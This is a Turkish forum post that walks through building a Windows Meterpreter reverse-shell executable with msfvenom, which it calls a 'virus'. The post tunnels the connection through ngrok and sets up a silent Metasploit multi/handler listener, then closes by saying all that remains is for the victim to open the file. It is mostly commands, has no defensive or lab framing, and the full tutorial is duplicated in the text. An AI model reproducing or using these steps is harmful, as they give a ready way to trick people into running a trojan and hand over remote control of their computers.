- 25 Ağu 2023
- 80
- 23
Öncelikle port nedir? Port sizin bir cihaz, bir server'a uzaktan bağlanmanızı sağlayan kapıdır aslında. Ve bu kapıdan tehlikeli paketler de geçebilmektedir dolayısı ile port kendiliğinden açık asla gelmez, sizin açmanız gerekir ve bazen güvenlik duvarını da kapatmanız gerekebilir bu sebepten dolayı. Peki biz şimdi ne yapacağız?
Port açmak büyük bir derttir ve sizi anlıyorum çünkü ben de açamadım ve bir kaç yıldır bununla uğraştım. Fakat şimdi sizi bu dertten kurtarmak adına böyle bir konu açtım. Öyleyse konuya geçelim..
Şimdi söyleyeceklerim çok klişe gelebilir fakat bu konu diğer konulardan farklı ve burada bahsettiğim ngrok methodu diğerlerinden farklıdır
Sevgili kullanıcı öncelikle ngrok indirmelisin.
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
ardından ngrok tokenini almalısın ve bunu kaydetmelisin
./ngrok config add-authtoken <token>
Ardından ./ngrok tcp 8080 komudunu girin ve portu serveri aktifleştirin
Sunucumuz açıldı, güzel. Sakın kapatmayın ngrok'u
şimdi sıra virüsü oluşturmaya geldi biz payloadımızı msfvenom'dan oluşturacağız, tercihimdir, iyidir, güzeldir.
Komutlar:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows lhost=<ngroktan aldığınız ip> lport=<ngroktan aldığınız port> -f exe -o /root/virusumunadi.exe
ÖNEMLİ!!! (x.tcp.ngrok.com olan lhost : sonrası ise lport'tur. Ngrok'a 8080 komudunu girdik ancak kullanacağımız port o değil bize verdiği porttur.)
Şimdi metasploitimizi başlatma vaktidir!
Komutlar:
şimdi show options deyip ayarları görüntüleyelim
(İşte şimdi önemli noktalardan birindeyiz. Şuan dinleyiciyi setup ettiğimiz için kendi ip adresimizi ve portumuzu gireceğiz, port demişken endişe etme! Dert olmayacak bize bu
)
set LHOST 0.0.0.0
set LPORT 8080 (Ngrok'u çalıştırırken açmasını emir verdiğimiz port)
exploit -j -z (Ve bu son komutla sessiz modda dinleyici setup ettik şimdi tek gereken kurbanın virüsümüzü açmasıdır)
Port açmak büyük bir derttir ve sizi anlıyorum çünkü ben de açamadım ve bir kaç yıldır bununla uğraştım. Fakat şimdi sizi bu dertten kurtarmak adına böyle bir konu açtım. Öyleyse konuya geçelim..
Şimdi söyleyeceklerim çok klişe gelebilir fakat bu konu diğer konulardan farklı ve burada bahsettiğim ngrok methodu diğerlerinden farklıdır
Sevgili kullanıcı öncelikle ngrok indirmelisin.
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
ardından ngrok tokenini almalısın ve bunu kaydetmelisin
./ngrok config add-authtoken <token>
Ardından ./ngrok tcp 8080 komudunu girin ve portu serveri aktifleştirin
Sunucumuz açıldı, güzel. Sakın kapatmayın ngrok'u
şimdi sıra virüsü oluşturmaya geldi biz payloadımızı msfvenom'dan oluşturacağız, tercihimdir, iyidir, güzeldir.
Komutlar:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows lhost=<ngroktan aldığınız ip> lport=<ngroktan aldığınız port> -f exe -o /root/virusumunadi.exe
ÖNEMLİ!!! (x.tcp.ngrok.com olan lhost : sonrası ise lport'tur. Ngrok'a 8080 komudunu girdik ancak kullanacağımız port o değil bize verdiği porttur.)
Şimdi metasploitimizi başlatma vaktidir!
Komutlar:
msfconsole
[COLOR=rgb(97, 189, 109)][SIZE=5][B]use exploit/multi/handler[/B][/SIZE][/COLOR]
şimdi show options deyip ayarları görüntüleyelim
(İşte şimdi önemli noktalardan birindeyiz. Şuan dinleyiciyi setup ettiğimiz için kendi ip adresimizi ve portumuzu gireceğiz, port demişken endişe etme! Dert olmayacak bize bu
)
set LHOST 0.0.0.0
set LPORT 8080 (Ngrok'u çalıştırırken açmasını emir verdiğimiz port)
exploit -j -z (Ve bu son komutla sessiz modda dinleyici setup ettik şimdi tek gereken kurbanın virüsümüzü açmasıdır)